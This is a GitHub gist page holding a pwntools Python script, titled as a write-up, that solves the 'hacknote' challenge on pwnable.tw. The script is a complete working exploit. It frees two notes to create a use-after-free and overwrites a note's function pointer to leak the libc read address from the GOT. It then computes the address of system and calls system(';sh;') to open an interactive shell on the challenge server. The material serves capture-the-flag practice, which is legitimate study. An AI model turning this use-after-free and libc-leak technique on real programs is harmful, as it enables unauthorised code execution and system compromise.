Skip to content

Instantly share code, notes, and snippets.

@famasoon

famasoon/hacknote_writeup.py

Created September 15, 2019 13:00
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save famasoon/5ee28cf12361d164d0a4f15b5f1f9f76 to your computer and use it in GitHub Desktop.
Save famasoon/5ee28cf12361d164d0a4f15b5f1f9f76 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
hacknote_writeup.py
from pwn import *
context(os='linux', arch='i386')
HOST = 'chall.pwnable.tw'
PORT = 10102
PRINT_NOTE_FN = 0x804862b
LIBC_READ_OFFSET = 0xd41c0
LIBC_SYSTEM_OFFSET = 0x3a940
elf = ELF('./hacknote')
class Note:
def __init__(self, conn):
self.send = conn.send
self.sendline = conn.sendline
self.recv = conn.recv
self.recvuntil = conn.recvuntil
self.sendafter = conn.sendafter
def add_note(self, size, data):
self.sendafter(':', '1')
self.sendafter(':', str(size))
self.sendafter(':', data)
def delete_note(self, note_id):
self.sendafter(':', '2')
self.sendafter(':', str(note_id))
def print_note(self, note_id):
self.sendafter(':', '3')
self.sendafter(':', str(note_id))
if len(sys.argv) > 1 and sys.argv[1] == '-r':
conn = remote(HOST, PORT)
else:
conn = process(['./hacknote'])
log.info('Pwning start')
note = Note(conn)
# create 2 notes
note.add_note(16, "AAAA")
note.add_note(16, "BBBB")
# delete 2 notes
# UAF
note.delete_note(0)
note.delete_note(1)
# leak libc read address
# print_note(8, read_got_addr)
note.add_note(8, p32(PRINT_NOTE_FN) + p32(elf.got[b'read']))
# leak libc
note.print_note(0)
ret = u32(note.recv(4))
# calc system address
libc_base = ret - LIBC_READ_OFFSET
print("libc_base: ", hex(libc_base))
system_addr = libc_base + LIBC_SYSTEM_OFFSET
print("system: ", hex(system_addr))
# delete note
note.delete_note(2)
# system(";sh;")
note.add_note(8, p32(system_addr) + b';sh;')
note.print_note(0)
conn.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment